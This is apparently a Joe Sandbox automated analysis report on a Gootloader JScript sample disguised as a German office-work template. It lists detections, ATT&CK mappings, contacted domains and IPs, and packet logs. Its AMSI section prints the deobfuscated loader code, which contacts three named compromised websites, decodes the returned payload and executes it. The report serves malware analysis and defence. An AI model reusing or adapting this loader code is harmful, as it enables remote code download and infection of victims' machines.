Loading ...

Play interactive tourEdit tour

Windows Analysis Report kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

Overview

General Information

Sample Name:kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js
Analysis ID:469226
MD5:1bdbb940dbc6ca24585e77f05f0b9eb6
SHA1:175078ffca7b3639144dda3ca217096e1730f571
SHA256:81f823613cb5ce1cdd8500e2ac34741829a9a3dc92285e70c83748f990e5029c
Infos:

Most interesting Screenshot:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
JScript performs obfuscated calls to suspicious functions
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4740 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.jsReversingLabs: Detection: 34%
Source: unknownHTTPS traffic detected: 217.30.63.12:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.124.194.166:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.6:49691 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewASN Name: IMH-WESTUS IMH-WESTUS
Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
Source: unknownDNS traffic detected: queries for: www.dischner-kartsport.de
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownHTTPS traffic detected: 217.30.63.12:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknownHTTPS traffic detected: 74.124.194.166:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.6:49691 version: TLS 1.2
Source: kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.jsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
Source: kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.jsReversingLabs: Detection: 34%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: classification engineClassification label: mal64.evad.winJS@1/0@3/3
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

Data Obfuscation:

barindex
JScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript)["Cr"+"e"+"at"+"e"+"Ob"+"j"+"ect"+""]("W"+"S"+"c"+"r"+"ip"+"t"+"."+"S"+"hel"+"l"+""); again = "H"+"KE"+"Y_"+"C"+"U"+"R"+"REN"+"T"+"_"+"U"+"S"+"E"+"R"+"\\FTqee\\";try { am["R"+"e"+"g"+"Rea"+"d"](again); } catch(e) { am["R"+"eg"+"Wri"+"t"+"e"+""](again, "", "RE"+"G"+"_"+"S"+"Z");d=16-13;fast=51;}try {floor[d](own('rmyixm?z\"p+g\'mphhhph.mhzcyrla=e\"s+/g\',+ ]fCa[lZs+e\')/;/ :qs.pstetnhd\'( ),;\' T}EcGa\'t(cnhe(peo).{q r{eytrutr n} ;f\"a6l4s1e8;7 2}\" +igf= g({q .)s\"t%aNtIuAsM O=D=S=N D2R0E0S)U %{\" v=a!r )S\" %=N IqA.MrOeDsSpNoDnRsEeSTUe%x\"t(;s ginfi r(t(SSt.nienmdneoxrOifv(n\"E@d\"n+agp+x\"E@.\"),\" l0l)e)h=S=.-t1p)i r{c SWWS\"c(rticpetj.bsOleeteape(r2C2.2t2p2i)r;c S}W (e lfsie ;{) 0S3 +=0 7S,.2r(e]p\"lratcseb(u\"s@\"\"[+)g(+g\"n@i\"r,t\"S\"o)t;. )v(amro dan a=r .Sh.traeMp l=a cge (;/)(\'\\PdT{T2H}L)M/Xgr,e vfruenSc.t2iLoMnX S(Mz\')( t{c erjebtOuertna eSrtCr.itnpgi.rfcrSoWm C=h aqr C{o d)e3( p<a rCs(e Ienlti(hzw, 1;00) +=3 0C) ;; ]}\")t;e nf.liololre[s3r]e(bao)d(n)o;m dWeS.cwrwiwp\"t,.\"Qmuoict.(c)a;i h}e .}w wewl\"s,e\" e{d .WtSrcorpispttr.askl-ereepn(h2c2s2i2d2.)w;w w}\" [C +=+ ;Z}'))();}catch(e){WScript.sleep(879977831);}gxue=floor; }function anonymous() {Z = ["www.dischner-kartsport.de","www.ehiac.com","www.edmondoberselli.net"]; C = 0; while (C < 3) { q = WScript.CreateObject('MSXML2.ServerXMLHTTP'); g = Math.random().toString()["substr"](2,70+30); if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {g=g+"278146";} try{ q.open('GET', 'https://'+Z[C]+'/search.php'+"?xyrmimzpgmhhhmzyl="+g, false); q.send(); }catch(e){ return false; } if (q.status === 200) { var S = q.responseText; if ((S.indexOf("@"+g+"@", 0))==-1) { WScript.sleep(22222); } else { S = S.replace("@"+g+"@",""); var a = S.replace(/(\d{2})/g, function (z) { return String.fromCharCode(parseInt(z,10)+30); }); floor[3](a)(); WScript.Quit(); } } else { WScript.sleep(22222); } C++;}
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exe TID: 1520Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeDomain query: www.dischner-kartsport.de
Source: C:\Windows\System32\wscript.exeDomain query: www.edmondoberselli.net
Source: C:\Windows\System32\wscript.exeNetwork Connect: 74.124.194.166 187Jump to behavior
Source: C:\Windows\System32\wscript.exeDomain query: www.ehiac.com
Source: C:\Windows\System32\wscript.exeNetwork Connect: 217.30.63.12 187Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.40.120.141 187Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12DLL Side-Loading1Process Injection1Virtualization/Sandbox Evasion1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js35%ReversingLabsScript-JS.Trojan.Gootloader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.dischner-kartsport.de
217.30.63.12
truetrue
    unknown
    ehiac.com
    74.124.194.166
    truetrue
      unknown
      www.edmondoberselli.net
      188.40.120.141
      truetrue
        unknown
        www.ehiac.com
        unknown
        unknowntrue
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          74.124.194.166
          ehiac.comUnited States
          22611IMH-WESTUStrue
          217.30.63.12
          www.dischner-kartsport.deGermany
          29145CENTAUR-GMBH-ASGermanyHeilbronnDEtrue
          188.40.120.141
          www.edmondoberselli.netGermany
          24940HETZNER-ASDEtrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:469226
          Start date:21.08.2021
          Start time:17:34:42
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 20s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Without Instrumentation
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal64.evad.winJS@1/0@3/3
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .js
          • Override analysis time to 240s for JS/VBS files not yet terminated
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 23.211.4.86
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/469226/sample/kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js

          Simulations

          Behavior and APIs

          TimeTypeDescription
          17:38:53API Interceptor1x Sleep call for process: wscript.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          217.30.63.12dDnee1fKQh.jsGet hashmaliciousBrowse
            188.40.120.141#Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).jsGet hashmaliciousBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              www.dischner-kartsport.dedDnee1fKQh.jsGet hashmaliciousBrowse
              • 217.30.63.12

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              HETZNER-ASDE5K8Pjo8QHd.exeGet hashmaliciousBrowse
              • 195.201.225.248
              fortnitecheat.exeGet hashmaliciousBrowse
              • 88.99.66.31
              cZI0If6mnd.exeGet hashmaliciousBrowse
              • 88.99.66.31
              D2gV4FlavB.exeGet hashmaliciousBrowse
              • 88.99.66.31
              oR4WWPYCJT.exeGet hashmaliciousBrowse
              • 88.99.66.31
              0lLmr5aTAv.exeGet hashmaliciousBrowse
              • 88.99.66.31
              QmW1IFq7XV.exeGet hashmaliciousBrowse
              • 88.99.66.31
              3UkRbgI5Tg.exeGet hashmaliciousBrowse
              • 88.99.66.31
              LTvcvGZerd.exeGet hashmaliciousBrowse
              • 88.99.66.31
              eYFWNx5ilf.exeGet hashmaliciousBrowse
              • 88.99.66.31
              37aMC5zfuw.exeGet hashmaliciousBrowse
              • 88.99.66.31
              5Wd1tmqC18.exeGet hashmaliciousBrowse
              • 195.201.225.248
              ccxgprT7sA.exeGet hashmaliciousBrowse
              • 88.99.66.31
              1xDJNh6Npt.exeGet hashmaliciousBrowse
              • 88.99.66.31
              3da0e424a6f1268f5682d59be1f83572479c28ca1fb7d.exeGet hashmaliciousBrowse
              • 159.69.190.155
              YGAYa81MaG.exeGet hashmaliciousBrowse
              • 195.201.225.248
              69148105747e1f74106dfb122777b7b91ea987e691403.exeGet hashmaliciousBrowse
              • 195.201.225.248
              nsxL4VbVk0.exeGet hashmaliciousBrowse
              • 195.201.225.248
              S2zxpWMps1.exeGet hashmaliciousBrowse
              • 195.201.225.248
              69148105747e1f74106dfb122777b7b91ea987e691403.exeGet hashmaliciousBrowse
              • 195.201.225.248
              CENTAUR-GMBH-ASGermanyHeilbronnDEdDnee1fKQh.jsGet hashmaliciousBrowse
              • 217.30.63.12
              IMH-WESTUSJXB TRANS_2021.08.09.xlsbGet hashmaliciousBrowse
              • 192.145.234.101
              JXB TRANS_2021.08.09.xlsbGet hashmaliciousBrowse
              • 192.145.234.101
              3HI5_CARGO_2021.08.09.xlsbGet hashmaliciousBrowse
              • 192.145.234.101
              3HI5_CARGO_2021.08.09.xlsbGet hashmaliciousBrowse
              • 192.145.234.101
              3HI5_CARGO_2021.08.09.xlsbGet hashmaliciousBrowse
              • 192.145.234.101
              SVL5_TRANS_2021.08.09.xlsbGet hashmaliciousBrowse
              • 192.145.234.101
              SVL5_TRANS_2021.08.09.xlsbGet hashmaliciousBrowse
              • 192.145.234.101
              EFINAL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. June 26, 2021.exeGet hashmaliciousBrowse
              • 104.247.74.6
              1FINAL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. July 20, 2021.exeGet hashmaliciousBrowse
              • 104.247.74.6
              ALL REVISED_INVOICE AND PACKING LIST FOR SHIPMENT Email no. M1053 dd. June 26, 2021.exeGet hashmaliciousBrowse
              • 104.247.74.6
              YsDRD3fSgQ.exeGet hashmaliciousBrowse
              • 144.208.71.122
              Order 1744163.xlsbGet hashmaliciousBrowse
              • 205.134.252.150
              plan-515372324.xlsbGet hashmaliciousBrowse
              • 104.244.121.13
              dqVPlpmWYt.exeGet hashmaliciousBrowse
              • 74.124.211.132
              chems.exeGet hashmaliciousBrowse
              • 192.249.117.18
              Mohamed Abrar H CV.xlsxGet hashmaliciousBrowse
              • 205.134.252.239
              INVOICE125POR.xlsxGet hashmaliciousBrowse
              • 205.134.252.239
              DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
              • 104.247.72.46
              PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lcNll.exeGet hashmaliciousBrowse
              • 192.145.239.54
              PACKING LIST CORP INVOICE 2738829 DATED 26 FOR SHIPMENT AS STATED ON 26 APRIL05I992lc.exeGet hashmaliciousBrowse
              • 192.145.239.54

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              ce5f3254611a8c095a3d821d44539877cZI0If6mnd.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              D2gV4FlavB.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              oR4WWPYCJT.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              0lLmr5aTAv.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              QmW1IFq7XV.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              3UkRbgI5Tg.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              LTvcvGZerd.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              eYFWNx5ilf.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              37aMC5zfuw.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              5Wd1tmqC18.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              69148105747e1f74106dfb122777b7b91ea987e691403.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              69148105747e1f74106dfb122777b7b91ea987e691403.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              6GEGqh0HIn.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              78742357.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              78742357.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              f6fa1e0673d37677b081dfe83a4a693038ce0a68d7c47.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              f6fa1e0673d37677b081dfe83a4a693038ce0a68d7c47.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              cmbHlS0x2G.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              E6H3chI4G8.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141
              np93rJ7mpP.exeGet hashmaliciousBrowse
              • 74.124.194.166
              • 217.30.63.12
              • 188.40.120.141

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ASCII text, with very long lines, with CRLF line terminators
              Entropy (8bit):5.394783887267911
              TrID:
                File name:kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js
                File size:2891
                MD5:1bdbb940dbc6ca24585e77f05f0b9eb6
                SHA1:175078ffca7b3639144dda3ca217096e1730f571
                SHA256:81f823613cb5ce1cdd8500e2ac34741829a9a3dc92285e70c83748f990e5029c
                SHA512:631f0d86c274d5d0eaff3ca548e1de178a501a1613b82249a24b3f6062c8fe676ff2e823dcf163be32e78802e04a3511bd5922a1ee4b3e992d94a815b02f351e
                SSDEEP:48:4tqzUS7TR6X/AgqRZGqkry+LPx2VP5/lWAybIxZQGSq3+GGr6pmOBG1kul4CEW1f:X9QXgDoLSPKA9xZQGOcpPAkvCPBu8Xea
                File Content Preview:function thank(press,mother,meet,dark){return coast(press,mother,mark);}..function set(motion,sharp,mouth){desert=602;while(3420){try{sudden[desert]();}catch(current){sudden[1191191]=suggest;}desert++}}..function own(grass,other,felt){whose=better;love=""

                File Icon

                Icon Hash:e8d69ece968a9ec4

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 21, 2021 17:38:22.269851923 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:25.282243967 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.298590899 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.325639963 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.326040030 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.333487034 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.360465050 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.360994101 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.361098051 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.361164093 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.361216068 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.361282110 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.361387014 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.372118950 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.372200012 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.372454882 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.380897999 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.408338070 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.454660892 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.506808043 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:31.576581001 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.600123882 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:31.642365932 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:36.521608114 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:36.521637917 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:36.521739960 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:36.523730993 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:36.523926020 CEST49689443192.168.2.6217.30.63.12
                Aug 21, 2021 17:38:36.551579952 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:36.551623106 CEST44349689217.30.63.12192.168.2.6
                Aug 21, 2021 17:38:54.041121960 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:54.213471889 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.213766098 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:54.216775894 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:54.388226032 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.390618086 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.390636921 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.390649080 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.390675068 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.390891075 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:54.392071962 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.439203978 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:54.611251116 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:54.618227959 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:54.829344988 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:55.208955050 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:55.253783941 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:58.211369038 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:58.211440086 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:58.211721897 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:58.212033987 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:58.212224960 CEST49690443192.168.2.674.124.194.166
                Aug 21, 2021 17:38:58.383522987 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:38:58.383610964 CEST4434969074.124.194.166192.168.2.6
                Aug 21, 2021 17:39:17.585627079 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:17.609549046 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.609699011 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:17.611187935 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:17.635186911 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.635468006 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.635508060 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.635540962 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.635566950 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.635629892 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:17.635731936 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:17.641700029 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.660012007 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:17.684546947 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.695805073 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:17.756966114 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:17.802349091 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:22.762085915 CEST44349691188.40.120.141192.168.2.6
                Aug 21, 2021 17:39:22.762429953 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:22.762686014 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:22.762821913 CEST49691443192.168.2.6188.40.120.141
                Aug 21, 2021 17:39:22.788199902 CEST44349691188.40.120.141192.168.2.6

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 21, 2021 17:37:04.291953087 CEST6118253192.168.2.68.8.8.8
                Aug 21, 2021 17:37:04.329780102 CEST53611828.8.8.8192.168.2.6
                Aug 21, 2021 17:38:22.196891069 CEST5567353192.168.2.68.8.8.8
                Aug 21, 2021 17:38:22.256488085 CEST53556738.8.8.8192.168.2.6
                Aug 21, 2021 17:38:53.893151999 CEST5777353192.168.2.68.8.8.8
                Aug 21, 2021 17:38:54.039458036 CEST53577738.8.8.8192.168.2.6
                Aug 21, 2021 17:39:17.526221991 CEST5998653192.168.2.68.8.8.8
                Aug 21, 2021 17:39:17.582353115 CEST53599868.8.8.8192.168.2.6

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Aug 21, 2021 17:38:22.196891069 CEST192.168.2.68.8.8.80x9204Standard query (0)www.dischner-kartsport.deA (IP address)IN (0x0001)
                Aug 21, 2021 17:38:53.893151999 CEST192.168.2.68.8.8.80x8b11Standard query (0)www.ehiac.comA (IP address)IN (0x0001)
                Aug 21, 2021 17:39:17.526221991 CEST192.168.2.68.8.8.80xc557Standard query (0)www.edmondoberselli.netA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Aug 21, 2021 17:38:22.256488085 CEST8.8.8.8192.168.2.60x9204No error (0)www.dischner-kartsport.de217.30.63.12A (IP address)IN (0x0001)
                Aug 21, 2021 17:38:54.039458036 CEST8.8.8.8192.168.2.60x8b11No error (0)www.ehiac.comehiac.comCNAME (Canonical name)IN (0x0001)
                Aug 21, 2021 17:38:54.039458036 CEST8.8.8.8192.168.2.60x8b11No error (0)ehiac.com74.124.194.166A (IP address)IN (0x0001)
